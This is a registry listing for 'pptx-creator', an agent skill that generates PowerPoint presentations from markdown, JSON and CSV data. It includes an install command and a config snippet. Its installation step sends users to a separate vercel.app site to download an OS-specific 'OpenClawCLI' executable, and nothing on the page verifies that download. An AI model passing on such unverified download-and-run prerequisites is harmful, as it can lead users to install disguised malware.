ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 4/5

pptx-creator

Create professional PowerPoint presentations from outlines, data sources, or AI-generated content. Supports custom templates, style presets, charts/tables from data, and AI-generated images. Use when asked to create slides, pitch decks, reports, or presentations.

Why use this skill?

Automate your slide deck creation with the pptx-creator skill. Build professional PowerPoint presentations from markdown, JSON, and data sources effortlessly.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/thiagoruss0/pptx-creatord
Or

What This Skill Does

The pptx-creator skill is a robust automation tool designed to streamline the creation of professional PowerPoint presentations. By leveraging the OpenClawCLI, this skill allows users to transform raw Markdown outlines, JSON configurations, or simple topic prompts into fully formatted slide decks. It includes built-in styling for various business contexts, such as corporate, startup, or executive themes, while supporting dynamic elements like CSV-sourced charts, tables, and AI-generated imagery. It serves as an end-to-end bridge between data and visual storytelling.

Installation

Before you begin, ensure you have the OpenClawCLI installed. Visit https://openclawcli.vercel.app/ to download the version specific to your OS. Once installed, you can integrate this skill into your environment using the command: clawhub install openclaw/skills/skills/thiagoruss0/pptx-creatord. Ensure you have the uv environment manager installed to execute the provided scripts efficiently.

Use Cases

This skill is perfect for professionals who need to produce recurring reports, pitch decks, or academic presentations. Use it to:

  • Automate Q4 sales reviews or monthly performance reporting using data exported to CSV.
  • Quickly draft internal presentations from structured meeting notes or markdown documents.
  • Standardize branding across an entire organization by building custom templates from existing branded PPTX files.
  • Generate engaging slide backgrounds and content imagery using AI-assisted prompt generation during the build process.

Example Prompts

  1. "Create a 10-slide pitch deck for our new software launch. Use the 'startup' template and include a bar chart based on the data in 'market_data.csv'."
  2. "Draft a Q4 financial summary presentation. Use the 'corporate' template. I've attached my notes in a markdown file named 'outline.md'."
  3. "Convert my 'Annual_Review.json' file into a presentation with the 'executive' theme. Please generate images for the team slides."

Tips & Limitations

To get the best results, ensure your data files (CSV) are clean and correctly formatted for chart generation. When using AI image generation, be specific with your descriptions (e.g., 'minimalist' or 'professional') to ensure visual consistency. Note that while the tool is excellent for structure and content, complex, highly custom slide designs requiring non-standard animation paths may still require manual polish within PowerPoint after generation. Always verify your output with a test run using the --list-templates flag to ensure the selected theme meets your branding requirements.

Metadata

Stars946
Views0
Updated2026-02-13
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-thiagoruss0-pptx-creatord": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#presentation#automation#powerpoint#productivity#markdown
Safety Score: 4/5

Flags: file-write, file-read, code-execution